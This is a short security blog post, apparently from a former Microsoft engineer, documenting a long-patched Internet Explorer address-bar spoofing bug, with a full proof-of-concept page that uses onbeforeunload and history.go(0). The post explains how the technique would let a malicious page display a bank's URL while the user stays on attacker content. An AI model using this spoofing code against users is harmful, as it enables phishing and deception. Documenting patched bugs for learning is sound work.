URL Spoofing via onbeforeunload and history.go(0)

I was looking at address bar spoofing scenarios and found that combining window.onbeforeunload with history.go(0) produced a clean URL spoof on Windows XP. When a user typed a new URL and pressed Enter, the onbeforeunload handler would fire and call history.go(0), which aborted the navigation while leaving the newly typed URL visible in the address bar. The page itself never changed. A similar technique had been published before (lcamtuf’s ietrap), but this one used a slightly different mechanism without document.open. It did not work on Windows Vista.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>urlSpoofOnBeforeUnload</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>urlSpoofOnBeforeUnload</h2>
</center>
<div id="mainText">
	While trying to navigate to a different URL, we will abort the navigaton but keep the typed URL in the addressBar.<br />
	This is similar to this one [http://lcamtuf.coredump.cx/ietrap/] but it works only on<b>before</b>unload and it's not
	using the document.open. Just a history.go(0)<br /><br />
	In other words, we achieve the same thing [http://lcamtuf.coredump.cx/ietrap/] but using a different technique.<br /><br />
	<font color="blue">
		<b>Go ahead! Type any URL in the addressBar, and let's see what happens...</b><br /><br />
	</font>
	This version <b>does not work</b> on Windows Vista.
</div>
<hr />

<script language="JavaScript">
window.onbeforeunload = function()
{
   history.go(0);
}

if (!window.opener)		// Just a flag to show a different text when reloading...
{
	window.opener = 1;
}
else
{
	document.all.mainText.innerHTML = 'The URL on the addressBar has changed, however, we are still on the same page.';
}

</script>
</font>
</body>
</html>

When onbeforeunload fires during an address bar navigation, calling history.go(0) causes IE to restart the current page load, which effectively cancels the outgoing navigation. However, the address bar does not revert to the original URL — it retains whatever the user had typed. A visitor to a malicious page could be shown a spoofed URL (say, a bank’s login page address) in the address bar while actually remaining on attacker-controlled content. The Vista fix (protected mode / process isolation changes) broke this particular path; the follow-up post addresses that.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Resident Script via Cached execScript from an Iframe] :: [URL Spoofing via onbeforeunload — Vista-Compatible Variant] >